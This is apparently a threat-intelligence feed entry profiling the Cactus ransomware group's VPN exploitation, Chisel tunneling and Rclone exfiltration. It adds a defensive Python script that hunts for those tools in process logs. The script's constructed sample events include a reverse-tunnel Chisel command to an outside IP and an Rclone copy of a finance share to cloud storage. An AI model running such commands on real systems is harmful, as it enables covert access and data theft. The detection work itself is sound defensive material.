Inside the Operations of Cactus: The Rise of a Stealth-Focused Ransomware Threat
ID: bd893c78-3c4c-5101-84ac-0d9fff62501f
STIX ID: report--bd893c78-3c4c-5101-84ac-0d9fff62501f
Feed Name: Brandefense Blog
This report profiles the Cactus ransomware group, a financially motivated, highly automated and stealth-focused actor observed since 2023. Cactus gains direct enterprise access by exploiting unpatched VPN appliances, uses Chisel for covert tunneling and Rclone for exfiltration to cloud storage, and runs double-extortion campaigns against large organizations, with more than 100 confirmed victims by early 2025. The report details the group's persistence and C2 techniques, tooling and evolution, and closes with prioritized defensive recommendations: patch VPN appliances, enforce MFA, monitor for Chisel and Rclone activity and for ntuser.dat anomalies, harden remote management, and segment networks.
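The summary above recommends monitoring for Chisel and Rclone. As an added example that is not part of the original report, the script below hunts for both tools in process-creation logs. It matches on binary name and, to catch renamed copies, on CLI features that are real parts of each tool (Chisel's `client`/`server` subcommands, `R:` reverse-remote syntax and `--fingerprint` flag; Rclone's transfer verbs, `remote:path` destinations and `--config`/`--transfers` flags). The log field names (`host`, `image`, `cmdline`) and the sample events are constructed for the example; the ntuser.dat recommendation is not covered here because the summary does not say what the anomaly looks like.

```python
"""Heuristic hunt for Chisel and Rclone launches in process-creation logs.

Added example. Event field names are assumed (Sysmon-like) and the sample
events are constructed; nothing here is taken from the original report.
"""
import json
import re
from typing import Dict, List

# Constructed sample events: two tool launches under innocuous file names,
# plus two benign commands that share surface features (ssh -R, robocopy).
SAMPLE_EVENTS = [
    json.dumps({"host": "ws-014", "image": r"C:\Users\Public\svc.exe",
                "cmdline": r"svc.exe client --fingerprint abc 203.0.113.10:443 R:0.0.0.0:1080:socks"}),
    json.dumps({"host": "fs-01", "image": r"C:\ProgramData\rc.exe",
                "cmdline": r"rc.exe copy D:\Shares\Finance mega:backup --config C:\ProgramData\rc.conf --transfers 16"}),
    json.dumps({"host": "ws-022", "image": r"C:\Program Files\Git\usr\bin\ssh.exe",
                "cmdline": r"ssh.exe -R 8080:localhost:80 user@jump.example.net"}),
    json.dumps({"host": "ws-031", "image": r"C:\Windows\System32\robocopy.exe",
                "cmdline": r"robocopy.exe D:\Data E:\Backup /MIR"}),
]

# Chisel: 'R:' reverse remotes such as R:socks or R:0.0.0.0:1080:socks, and
# client flags that exist in the real tool.
CHISEL_REMOTE = re.compile(r"^R:[\w.\-]*(:[\w.\-]*)*$")
CHISEL_FLAGS = {"--fingerprint", "--auth", "--keepalive", "--max-retry-count"}

# Rclone: transfer verbs and 'remote:path' arguments. The remote name needs at
# least two characters before the colon, so Windows drive paths (D:\...) do
# not match.
RCLONE_VERBS = {"copy", "sync", "move", "copyto", "moveto"}
RCLONE_REMOTE = re.compile(r"^[A-Za-z][\w\-]+:")
RCLONE_FLAGS = {"--config", "--transfers", "--bwlimit", "--no-check-certificate"}


def classify(event: Dict[str, str]) -> List[str]:
    """Return the reasons an event looks like Chisel or Rclone ([] if none)."""
    image = event.get("image", "").lower()
    tokens = event.get("cmdline", "").split()  # assumes no quoted spaces
    lowered = [t.lower() for t in tokens]
    reasons: List[str] = []

    # Name-based match: catches unrenamed binaries.
    if "chisel" in image:
        reasons.append("image name contains 'chisel'")
    if "rclone" in image:
        reasons.append("image name contains 'rclone'")

    # Behaviour-based match: catches renamed binaries by their CLI shape.
    if any(t in ("client", "server") for t in lowered[1:]):
        remotes = [t for t in tokens[1:] if CHISEL_REMOTE.match(t)]
        flags = CHISEL_FLAGS.intersection(lowered)
        if remotes or flags:
            reasons.append(f"chisel-style args: remotes={remotes} flags={sorted(flags)}")

    verb = lowered[1] if len(lowered) > 1 else ""
    if verb in RCLONE_VERBS:
        remotes = [t for t in tokens[2:] if RCLONE_REMOTE.match(t)]
        flags = RCLONE_FLAGS.intersection(lowered)
        if remotes or flags:
            reasons.append(f"rclone-style args: remotes={remotes} flags={sorted(flags)}")
    return reasons


def hunt(raw_events: List[str]) -> List[Dict[str, object]]:
    """Parse JSON log lines and return one finding per suspicious event."""
    findings: List[Dict[str, object]] = []
    for line in raw_events:
        event = json.loads(line)
        reasons = classify(event)
        if reasons:
            findings.append({"host": event["host"], "image": event["image"],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in hunt(SAMPLE_EVENTS):
        print(finding["host"], finding["image"], *finding["reasons"], sep="\n  ")
```

Run against the constructed events, the two renamed tool launches are flagged and the `ssh -R` and `robocopy` commands are not, because the Chisel check requires a literal `R:` token next to a `client`/`server` subcommand and the Rclone check rejects single-letter drive prefixes. In production the same logic would sit on Sysmon Event ID 1 or EDR process telemetry, and the flag lists should be treated as a starting point rather than a complete signature.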
